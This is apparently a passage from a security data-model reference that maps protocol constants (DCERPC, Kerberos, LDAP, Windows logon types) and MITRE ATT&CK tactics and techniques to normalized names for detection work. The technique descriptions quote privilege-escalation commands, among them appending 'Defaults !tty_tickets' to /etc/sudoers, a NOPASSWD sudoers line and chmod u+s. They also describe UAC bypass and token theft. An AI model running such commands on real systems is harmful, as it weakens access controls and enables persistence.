44e265dd-7daf-42cd-8560-3cdb6e7a2729:8 XDM_CONST.DCERPC_OPERATION_TS_PROXY_SETUP_RECEIVE_PIPE
44e265dd-7daf-42cd-8560-3cdb6e7a2729:9 XDM_CONST.DCERPC_OPERATION_TS_PROXY_SEND_TO_SERVER
53b46b02-c73b-4a3e-8dee-b16b80672fc0:0 XDM_CONST.DCERPC_OPERATION_RPC_GET_SESSION_IP
8fb6d884-2388-11d0-8c35-00c04fda2795:0 XDM_CONST.DCERPC_OPERATION_W32_TIME_SYNC
8fb6d884-2388-11d0-8c35-00c04fda2795:1 XDM_CONST.DCERPC_OPERATION_W32_TIME_GET_NETLOGON_SERVICE_BITS
8fb6d884-2388-11d0-8c35-00c04fda2795:2 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_PROVIDER_STATUS
8fb6d884-2388-11d0-8c35-00c04fda2795:3 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_SOURCE
8fb6d884-2388-11d0-8c35-00c04fda2795:4 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_PROVIDER_CONFIGURATION
8fb6d884-2388-11d0-8c35-00c04fda2795:5 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_CONFIGURATION
8fb6d884-2388-11d0-8c35-00c04fda2795:6 XDM_CONST.DCERPC_OPERATION_W32_TIME_QUERY_STATUS
8fb6d884-2388-11d0-8c35-00c04fda2795:7 XDM_CONST.DCERPC_OPERATION_W32_TIME_LOG
1a927394-352e-4553-ae3f-7cf4aafca620:0 XDM_CONST.DCERPC_OPERATION_WDS_RPC_MESSAGE
811109bf-a4e1-11d1-ab54-00a0c91e9b45:0 XDM_CONST.DCERPC_OPERATION_R_WINS_TOMBSTONE_DB_RECS
811109bf-a4e1-11d1-ab54-00a0c91e9b45:1 XDM_CONST.DCERPC_OPERATION_R_WINS_CHECK_ACCESS
ccd8c074-d0e5-4a40-92b4-d074faa6ba28:0 XDM_CONST.DCERPC_OPERATION_WITNESSR_GET_INTERFACE_LIST
ccd8c074-d0e5-4a40-92b4-d074faa6ba28:1 XDM_CONST.DCERPC_OPERATION_WITNESSR_REGISTER
ccd8c074-d0e5-4a40-92b4-d074faa6ba28:2 XDM_CONST.DCERPC_OPERATION_WITNESSR_UN_REGISTER
ccd8c074-d0e5-4a40-92b4-d074faa6ba28:3 XDM_CONST.DCERPC_OPERATION_WITNESSR_ASYNC_NOTIFY
ccd8c074-d0e5-4a40-92b4-d074faa6ba28:4 XDM_CONST.DCERPC_OPERATION_WITNESSR_REGISTER_EX
3.15 | XDM_CONST.KERBEROS_MSG_TYPE
Kerberos 5 message type assigned numbers.
3.16 | XDM_CONST.KERBEROS_PRINCIPAL_TYPE
The type of the principal.
5 XDM_CONST.KERBEROS_PRINCIPAL_TYPE_UID Unique ID
3.17 | XDM_CONST.KERBEROS_KDC_OPTION
Flags requested in the ticket.
0 XDM_CONST.KERBEROS_KDC_OPTION_RESERVED
1 XDM_CONST.KERBEROS_KDC_OPTION_FORWARDABLE
2 XDM_CONST.KERBEROS_KDC_OPTION_FORWARDED
3 XDM_CONST.KERBEROS_KDC_OPTION_PROXIABLE
4 XDM_CONST.KERBEROS_KDC_OPTION_PROXY
5 XDM_CONST.KERBEROS_KDC_OPTION_ALLOW_POST_DATE
6 XDM_CONST.KERBEROS_KDC_OPTION_POST_DATED
7 XDM_CONST.KERBEROS_KDC_OPTION_INVALID
8 XDM_CONST.KERBEROS_KDC_OPTION_RENEWABLE
9 XDM_CONST.KERBEROS_KDC_OPTION_INITIAL
10 XDM_CONST.KERBEROS_KDC_OPTION_PRE_AUTHENT
11 XDM_CONST.KERBEROS_KDC_OPTION_HW_AUTHENT
12 XDM_CONST.KERBEROS_KDC_OPTION_REQUEST_ANONYMOUS
13 XDM_CONST.KERBEROS_KDC_OPTION_OK_AS_DELEGATE
15 XDM_CONST.KERBEROS_KDC_OPTION_CANONICALIZE
26 XDM_CONST.KERBEROS_KDC_OPTION_DISABLE_TRANSITED_CHECK
27 XDM_CONST.KERBEROS_KDC_OPTION_RENEWABLE_OK
28 XDM_CONST.KERBEROS_KDC_OPTION_ENC_TKT_IN_SKEY
30 XDM_CONST.KERBEROS_KDC_OPTION_RENEW
31 XDM_CONST.KERBEROS_KDC_OPTION_VALIDATE
3.18 | XDM_CONST.KERBEROS_ENCRYPTION_TYPE
Encryption type assigned numbers.
1 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_CRC CRC-32 checksum of the data, as computed using the DES block cipher
2 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_MD4 MD4 checksum of the data, as computed using the DES block cipher
3 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_MD5 MD5 checksum of the data, as computed using the DES block cipher
5 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_MD5 MD5 checksum of the data, as computed using triple DES block cipher
7 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_SHA1 SHA-1 checksum of the data, as computed using triple DES block cipher
8 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_HMAC_SHA1 HMAC-SHA-1 checksum of the data, as computed using the DES block cipher
16 XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_SHA1_KD Triple DES block cipher in EDE-CBC mode with SHA-1 checksum
3.19 | XDM_CONST.KERBEROS_PA_TYPE
1 XDM_CONST.KERBEROS_PA_TYPE_TGS_REQ
2 XDM_CONST.KERBEROS_PA_TYPE_ENC_TIMESTAMP
3 XDM_CONST.KERBEROS_PA_TYPE_PW_SALT
5 XDM_CONST.KERBEROS_PA_TYPE_ENC_UNIX_TIME
6 XDM_CONST.KERBEROS_PA_TYPE_SANDIA_SECUREID
7 XDM_CONST.KERBEROS_PA_TYPE_SESAME
8 XDM_CONST.KERBEROS_PA_TYPE_OSF_DCE
9 XDM_CONST.KERBEROS_PA_TYPE_CYBERSAFE_SECUREID
10 XDM_CONST.KERBEROS_PA_TYPE_AFS3_SALT
11 XDM_CONST.KERBEROS_PA_TYPE_ETYPE_INFO
12 XDM_CONST.KERBEROS_PA_TYPE_SAM_CHALLENGE
13 XDM_CONST.KERBEROS_PA_TYPE_SAM_RESPONSE
14 XDM_CONST.KERBEROS_PA_TYPE_PK_AS_REQ_OLD
15 XDM_CONST.KERBEROS_PA_TYPE_PK_AS_REP_OLD
16 XDM_CONST.KERBEROS_PA_TYPE_PK_AS_REQ
17 XDM_CONST.KERBEROS_PA_TYPE_PK_AS_REP
18 XDM_CONST.KERBEROS_PA_TYPE_PK_OCSP_RESPONSE
19 XDM_CONST.KERBEROS_PA_TYPE_ETYPE_INFO2
20 XDM_CONST.KERBEROS_PA_TYPE_USE_SPECIFIED_KVNO
21 XDM_CONST.KERBEROS_PA_TYPE_SAM_REDIRECT
22 XDM_CONST.KERBEROS_PA_TYPE_GET_FROM_TYPED_DATA
23 XDM_CONST.KERBEROS_PA_TYPE_SAM_ETYPE_INFO
24 XDM_CONST.KERBEROS_PA_TYPE_ALT_PRINC
25 XDM_CONST.KERBEROS_PA_TYPE_SERVER_REFERRAL
30 XDM_CONST.KERBEROS_PA_TYPE_SAM_CHALLENGE2
31 XDM_CONST.KERBEROS_PA_TYPE_SAM_RESPONSE2
41 XDM_CONST.KERBEROS_PA_TYPE_EXTRA_TGT
101 XDM_CONST.KERBEROS_PA_TYPE_TD_PKINIT_CMS_CERTIFICATES
102 XDM_CONST.KERBEROS_PA_TYPE_TD_KRB_PRINCIPAL
103 XDM_CONST.KERBEROS_PA_TYPE_TD_KRB_REALM
104 XDM_CONST.KERBEROS_PA_TYPE_TD_TRUSTED_CERTIFIERS
105 XDM_CONST.KERBEROS_PA_TYPE_TD_CERTIFICATE_INDEX
106 XDM_CONST.KERBEROS_PA_TYPE_TD_APP_DEFINED_ERROR
107 XDM_CONST.KERBEROS_PA_TYPE_TD_REQ_NONCE
108 XDM_CONST.KERBEROS_PA_TYPE_TD_REQ_SEQ
109 XDM_CONST.KERBEROS_PA_TYPE_TD_DH_PARAMETERS
111 XDM_CONST.KERBEROS_PA_TYPE_TD_CMS_DIGEST_ALGORITHMS
112 XDM_CONST.KERBEROS_PA_TYPE_TD_CERT_DIGEST_ALGORITHMS
128 XDM_CONST.KERBEROS_PA_TYPE_PAC_REQUEST
129 XDM_CONST.KERBEROS_PA_TYPE_FOR_USER
130 XDM_CONST.KERBEROS_PA_TYPE_FOR_X509_USER
131 XDM_CONST.KERBEROS_PA_TYPE_FOR_CHECK_DUPS
132 XDM_CONST.KERBEROS_PA_TYPE_AS_CHECKSUM
133 XDM_CONST.KERBEROS_PA_TYPE_FX_COOKIE
134 XDM_CONST.KERBEROS_PA_TYPE_AUTHENTICATION_SET
135 XDM_CONST.KERBEROS_PA_TYPE_AUTH_SET_SELECTED
136 XDM_CONST.KERBEROS_PA_TYPE_FX_FAST
137 XDM_CONST.KERBEROS_PA_TYPE_FX_ERROR
138 XDM_CONST.KERBEROS_PA_TYPE_ENCRYPTED_CHALLENGE
141 XDM_CONST.KERBEROS_PA_TYPE_OTP_CHALLENGE
142 XDM_CONST.KERBEROS_PA_TYPE_OTP_REQUEST
143 XDM_CONST.KERBEROS_PA_TYPE_OTP_CONFIRM
144 XDM_CONST.KERBEROS_PA_TYPE_OTP_PIN_CHANGE
145 XDM_CONST.KERBEROS_PA_TYPE_EPAK_AS_REQ
146 XDM_CONST.KERBEROS_PA_TYPE_EPAK_AS_REP
147 XDM_CONST.KERBEROS_PA_TYPE_PKINIT_KX
148 XDM_CONST.KERBEROS_PA_TYPE_PKU2U_NAME
149 XDM_CONST.KERBEROS_PA_TYPE_REQ_ENC_PA_REP
150 XDM_CONST.KERBEROS_PA_TYPE_AS_FRESHNESS
165 XDM_CONST.KERBEROS_PA_TYPE_SUPPORTED_ETYPES
166 XDM_CONST.KERBEROS_PA_TYPE_EXTENDED_ERROR
3.20 | XDM_CONST.KERBEROS_ERROR_CODE
Kerberos error code.
0 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NONE No error
3.21 | XDM_CONST.LDAP_OPERATION
The LDAP operation type.
3.22 | XDM_CONST.LDAP_SCOPE
The search scope in which this operation is performed.
3.23 | XDM_CONST.LDAP_BIND_AUTH_TYPE
The authentication type used for the bind operation.
Original Mapped Description
0 XDM_CONST.LDAP_BIND_AUTH_TYPE_SIMPLE Uses a simple authentication method, where the client sends the LDAP server a clear-text password.
3 XDM_CONST.LDAP_BIND_AUTH_TYPE_SASL Uses the Simple Authentication and Security Layer (SASL) to authenticate the client.
3.24 | XDM_CONST.LOGON_TYPE
A numeric value that indicates the type of logon session. See https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-logonsession.
2 XDM_CONST.LOGON_TYPE_INTERACTIVE Intended for users who are interactively using the machine, such as a user being logged on by a terminal server, remote shell, or similar process.
3 XDM_CONST.LOGON_TYPE_NETWORK Intended for high-performance servers to authenticate clear text passwords. LogonUser does not cache credentials for this logon type.
4 XDM_CONST.LOGON_TYPE_BATCH Intended for batch servers, where processes can be executed on behalf of a user without their direct intervention; or for higher performance servers that process many clear-text authentication attempts at a time, such as mail or web servers. LogonUser does not cache credentials for this logon type.
5 XDM_CONST.LOGON_TYPE_SERVICE Indicates a service-type logon. The account provided must have the service privilege enabled.
7 XDM_CONST.LOGON_TYPE_UNLOCK This logon type is intended for GINA DLLs logging on users who are interactively using the machine. This logon type allows a unique audit record to be generated that shows when the workstation was unlocked.
8 XDM_CONST.LOGON_TYPE_NETWORK_CLEARTEXT Preserves the name and password in the authentication packages, allowing the server to make connections to other network servers while impersonating the client. This allows a server to accept clear text credentials from a client, call LogonUser, verify that the user can access the system across the network, and still communicate with other servers.
9 XDM_CONST.LOGON_TYPE_NEW_CREDENTIALS Allows the caller to clone its current token and specify new credentials for outbound connections. The new logon session has the same local identity, but uses different credentials for other network connections.
3.25 | XDM_CONST.LOGON_IMPERSONATION_LEVEL
Impersonation is the ability of a thread to execute in a security context that is different from the context of the process that owns the thread. When running in the client's security context, the server 'is' the client, to some degree. See https://docs.microsoft.com/en-us/windows/win32/com/impersonation-levels
%%1831 XDM_CONST.LOGON_IMPERSONATION_LEVEL_ANONYMOUS The client is anonymous to the server. The server process can impersonate the client, but the impersonation token does not contain any information about the client. This level is only supported over the local interprocess communication transport. All other transports silently promote this level to identify.
%%1832 XDM_CONST.LOGON_IMPERSONATION_LEVEL_IDENTIFICATION The system default level. The server can obtain the client's identity, and the server can impersonate the client to do ACL checks.
%%1833 XDM_CONST.LOGON_IMPERSONATION_LEVEL_IMPERSONATION The server can impersonate the client's security context while acting on behalf of the client. The server can access local resources as the client. If the server is local, it can access network resources as the client. If the server is remote, it can access only resources that are on the same computer as the server.
%%1840 XDM_CONST.LOGON_IMPERSONATION_LEVEL_DELEGATION The most powerful impersonation level. When this level is selected, the server (whether local or remote) can impersonate the client's security context while acting on behalf of the client. During impersonation, the client's credentials (both local and network) can be passed to any number of computers.
3.26 | XDM_CONST.LOGON_ASSIGNED_RIGHT
User rights that are assigned in this logon. See https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/user-rights-assignment.
SeEnableDelegationPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_ENABLE_DELEGATION_PRIVILEGE Enable computer and user accounts to be trusted for delegation.
SeDelegateSessionUserImpersonatePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE Obtain an impersonation token for another user in the same session.
3.27 | XDM_CONST.DB_OPERATION
A canonical operation performed on the database.
ALTER XDM_CONST.DB_OPERATION_ALTER A request to alter the structure of the database, such as adding or removing a column in a table.
3.28 | XDM_CONST.MITRE_TACTIC
Tactics represent the 'why' of an ATT&CK technique or sub-technique. It is the adversary's tactical goal, the reason for performing an action. For example, an adversary may want to achieve credential access.
TA0009 XDM_CONST.MITRE_TACTIC_COLLECTION The adversary is trying to gather data of interest to their goal. Collection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's
objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and
keyboard input. https://attack.mitre.org/tactics/TA0009
TA0011 XDM_CONST.MITRE_TACTIC_COMMAND_AND_CONTROL The adversary is trying to communicate with compromised systems to control them. Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries
commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses. https://
attack.mitre.org/tactics/TA0011
TA0006 XDM_CONST.MITRE_TACTIC_CREDENTIAL_ACCESS The adversary is trying to steal account names and passwords. Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential
dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals. https://attack.mitre.org/tactics/TA0006
TA0005 XDM_CONST.MITRE_TACTIC_DEFENSE_EVASION The adversary is trying to avoid being detected. Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security
software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added
benefit of subverting defenses. https://attack.mitre.org/tactics/TA0005
TA0007 XDM_CONST.MITRE_TACTIC_DISCOVERY The adversary is trying to figure out your environment. Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient
themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often
used toward this post-compromise information-gathering objective. https://attack.mitre.org/tactics/TA0007
TA0002 XDM_CONST.MITRE_TACTIC_EXECUTION The adversary is trying to run malicious code. Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other
tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. https://attack.mitre.org/tactics/TA0002
TA0010 XDM_CONST.MITRE_TACTIC_EXFILTRATION The adversary is trying to steal data. Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include
compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.
https://attack.mitre.org/tactics/TA0010
TA0040 XDM_CONST.MITRE_TACTIC_IMPACT The adversary is trying to manipulate, interrupt, or destroy your systems and data. Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes.
Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to
follow through on their end goal or to provide cover for a confidentiality breach. https://attack.mitre.org/tactics/TA0040
TA0001 XDM_CONST.MITRE_TACTIC_INITIAL_ACCESS The adversary is trying to get into your network. Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting
weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords. https://
attack.mitre.org/tactics/TA0001
TA0008 XDM_CONST.MITRE_TACTIC_LATERAL_MOVEMENT The adversary is trying to move through your environment. Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring
the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish
Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. https://attack.mitre.org/tactics/TA0008
TA0003 XDM_CONST.MITRE_TACTIC_PERSISTENCE The adversary is trying to maintain their foothold. Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used
for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. https://attack.mitre.org/tactics/TA0003
TA0004 XDM_CONST.MITRE_TACTIC_PRIVILEGE_ESCALATION The adversary is trying to gain higher-level permissions. Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with
unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: *
SYSTEM/root level * local administrator * user account with admin-like access * user accounts with access to specific system or perform specific function These techniques often overlap with Persistence techniques, as OS features that let an
adversary persist can execute in an elevated context. https://attack.mitre.org/tactics/TA0004
TA0043 XDM_CONST.MITRE_TACTIC_RECONNAISSANCE The adversary is trying to gather information they can use to plan future operations. Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such
information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and
execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts. https://attack.mitre.org/tactics/TA0043
TA0042 XDM_CONST.MITRE_TACTIC_RESOURCE_DEVELOPMENT The adversary is trying to establish resources they can use to support operations. Resource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion. https://attack.mitre.org/tactics/TA0042
3.29 | XDM_CONST.MITRE_TECHNIQUE
Techniques represent 'how' an adversary achieves a tactical goal by performing an action. For example, an adversary may dump credentials to achieve credential access.
T1548 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit the privileges that a user can exercise on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. https://attack.mitre.org/techniques/T1548
T1548.002 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_BYPASS_USER_ACCOUNT_CONTROL Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity. (Citation: SANS UAC Bypass) https://attack.mitre.org/techniques/T1548/002
T1548.004 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_ELEVATED_EXECUTION_WITH_PROMPT Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials. (Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges. Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms. (Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code. (Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API. (Citation: Death by 1000 installers; it's all broken!) https://attack.mitre.org/techniques/T1548/004
T1548.001 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_SETUID_AND_SETGID An adversary may perform shell escapes or exploit vulnerabilities in an application with the setuid or setgid bits to get code running in a different user's context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page) Normally an application is run in the current user's context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn't need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits via bitmasking, chmod 4777 [file], or via shorthand naming, chmod u+s [file]. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future. (Citation: OSX Keydnap malware) https://attack.mitre.org/techniques/T1548/001
T1548.003 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_SUDO_AND_SUDO_CACHING Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. Within Linux and macOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though. Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additionally, if tty_tickets is disabled, adversaries can do this from any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo 'Defaults !tty_tickets' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. https://attack.mitre.org/techniques/T1548/003
T1134 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These tokens can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. (Citation: Pentestlab Token Manipulation) Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens. https://attack.mitre.org/techniques/T1134
T1134.002 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_CREATE_PROCESS_WITH_TOKEN Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas. (Citation: Microsoft RunAs) Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)). https://attack.mitre.org/techniques/T1134/002
T1134.003 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_MAKE_AND_IMPERSONATE_TOKEN Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread. https://attack.mitre.org/techniques/T1134/003
T1134.004 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_PARENT_PID_SPOOFING Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use. (Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context. (Citation: Microsoft UAC Nov 2018) Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). (Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106). (Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token. (Citation: XPNSec PPID Nov 2017) https://attack.mitre.org/techniques/T1134/004
